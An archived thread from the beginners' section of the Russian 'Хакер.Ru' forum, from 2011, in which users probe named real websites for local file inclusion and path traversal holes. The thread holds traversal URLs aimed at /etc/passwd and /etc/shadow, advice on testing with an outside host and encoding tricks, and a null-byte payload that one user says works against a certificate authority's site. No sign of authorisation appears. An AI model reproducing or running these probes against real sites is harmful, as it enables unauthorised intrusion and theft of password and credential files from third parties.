Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

Инклуд

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Инклуд
Имя
Сообщение << Старые топики   Новые топики >>
Инклуд - 2011-06-04 09:42:23.783333   
terter7777

Сообщений: 63
Оценки: 0
Присоединился: 2010-06-13 18:03:01.446666
 имеет ли место инклуд здесь http://www.elitestars.ru/content/rus/models_index.php?num=1&root_dir=

если при http://www.elitestars.ru/content/rus/models_index.php?num=1&root_dir=../../../etc/passwd
пишет что раздел пуст

а при http://www.elitestars.ru/content/rus/models_index.php?num=1&root_dir=../../../etc/shadow

выдает Sorry, this page not found.
Post #: 1
RE: Инклуд - 2011-06-04 09:49:48.330000   
Ltonid

Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
 поставь после равно ya.ru Если увидишь яндекс посреди страницы, то имеется, увидишь ошибку, значит стоит фильтр, но инклуд имеется, если ничего не увидишь то инклуда нет.
Post #: 2
RE: Инклуд - 2011-06-04 09:52:39.070000   
terter7777

Сообщений: 63
Оценки: 0
Присоединился: 2010-06-13 18:03:01.446666
 Sorry, this page not found. - Фильтр? Али нет?
Post #: 3
RE: Инклуд - 2011-06-04 09:57:51.886666   
Ltonid

Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
 Попробу извращения с http, https, ftp, www, разные кодировки
Пока не ясно. Если фильтр, он бы послал нафиг.
Post #: 4
RE: Инклуд - 2011-06-04 10:07:48.250000   
terter7777

Сообщений: 63
Оценки: 0
Присоединился: 2010-06-13 18:03:01.446666
 Все одно - sorry
Post #: 5
RE: Инклуд - 2011-06-04 10:14:04.716666   
terter7777

Сообщений: 63
Оценки: 0
Присоединился: 2010-06-13 18:03:01.446666
 Но если выбираешь файл существующий на сайте - пишет что раздел пуст например http://www.elitestars.ru/content/rus/models_index.php?num=1&root_dir=/content/rus/model.php
Post #: 6
RE: Инклуд - 2011-06-04 10:23:11.643333   
Ltonid

Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
 Вообщем ясно. Он реагирует на папку etc.
http://www.elitestars.ru/content/rus/models_index.php?num=1&root_dir=../../../root/ - как видишь он выдал опять какую то дребедень.

На файловый менеджер не похоже, а значит не инклуд. Ближе похоже на модуль галерии, которому надо указать лишь папку, а он ищет там фотки.
Post #: 7
RE: Инклуд - 2011-06-04 10:26:23.456666   
terter7777

Сообщений: 63
Оценки: 0
Присоединился: 2010-06-13 18:03:01.446666
 Значит этим путем не пройдешь?
Post #: 8
RE: Инклуд - 2011-06-04 10:34:36.446666   
Ltonid

Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
 Инклуд предполагает подключение стороннего файла, а тут максимум раскрытие путей т.е. взломать ничего не удастся.
Post #: 9
RE: Инклуд - 2011-06-04 14:43:57.743333   
terter7777

Сообщений: 63
Оценки: 0
Присоединился: 2010-06-13 18:03:01.446666
 Нашел инклуд http://cert.startcom.org/?lang=en&app=../../../../../../../../../../../../../../../etc/passwd%00.html но не могу прочитать файл shadow - http://cert.startcom.org/?lang=en&app=../../../../../../../../../../../../../../../etc/shadow%00html - есть способы обойти это?
Post #: 10
RE: Инклуд - 2011-06-04 20:54:52.850000   
r1dex

Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
 Можно, получаешь права рута и читаешь.
Post #: 11
Страниц:  [1]
Все форумы >> [Для начинающих] >> Инклуд







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.